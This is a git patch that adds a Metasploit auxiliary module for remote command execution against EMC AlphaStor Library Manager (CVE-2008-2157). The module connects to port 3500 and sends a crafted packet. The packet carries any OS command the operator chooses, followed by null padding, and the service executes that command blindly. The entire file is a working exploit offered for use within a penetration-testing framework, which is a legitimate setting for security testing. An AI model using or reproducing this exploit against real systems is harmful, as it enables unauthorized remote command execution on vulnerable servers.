From d7e706f6af0121db58a179556ae115960a4e243d Mon Sep 17 00:00:00 2001
From: Mario Ceballos <mc@metasploit.com>
Date: Sat, 11 Oct 2008 00:56:47 +0000
Subject: [PATCH] added aux module alphastor_librarymanager_exec.rb

git-svn-id: file:///home/svn/framework3/trunk@5737 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../emc/alphastor_librarymanager_exec.rb      | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb

diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
new file mode 100644
index 0000000000..d939ad5af3
--- /dev/null
+++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb
@@ -0,0 +1,61 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'EMC AlphaStor Library Manager Arbitrary Command Execution',
+			'Description'    => %q{
+					EMC AlphaStor Library Manager is prone to a remote command-injection vulnerability
+					because the application fails to properly sanitize user-supplied input.
+			},
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=703' ],
+					[ 'CVE', 'CVE-2008-2157' ],
+					[ 'BID', '29398' ],
+				],
+			'DisclosureDate' => 'May 27 2008'))
+
+			register_options( 
+				[
+					Opt::RPORT(3500),
+					OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > metasploit.txt']),
+				], self.class)
+	end
+
+	def run
+		connect
+
+		data = "\x75" + datastore['CMD']
+		pad  = "\x00" * 512
+		
+		pkt = data + pad		
+	
+		# commands are executed blindly.
+		print_status("Sending command: #{datastore['CMD']}")	
+		sock.put(pkt)
+
+		sleep(1)
+		
+		sock.get_once
+		
+		print_status("Executed '#{datastore['CMD']}'...")
+
+		disconnect
+	end
+end
+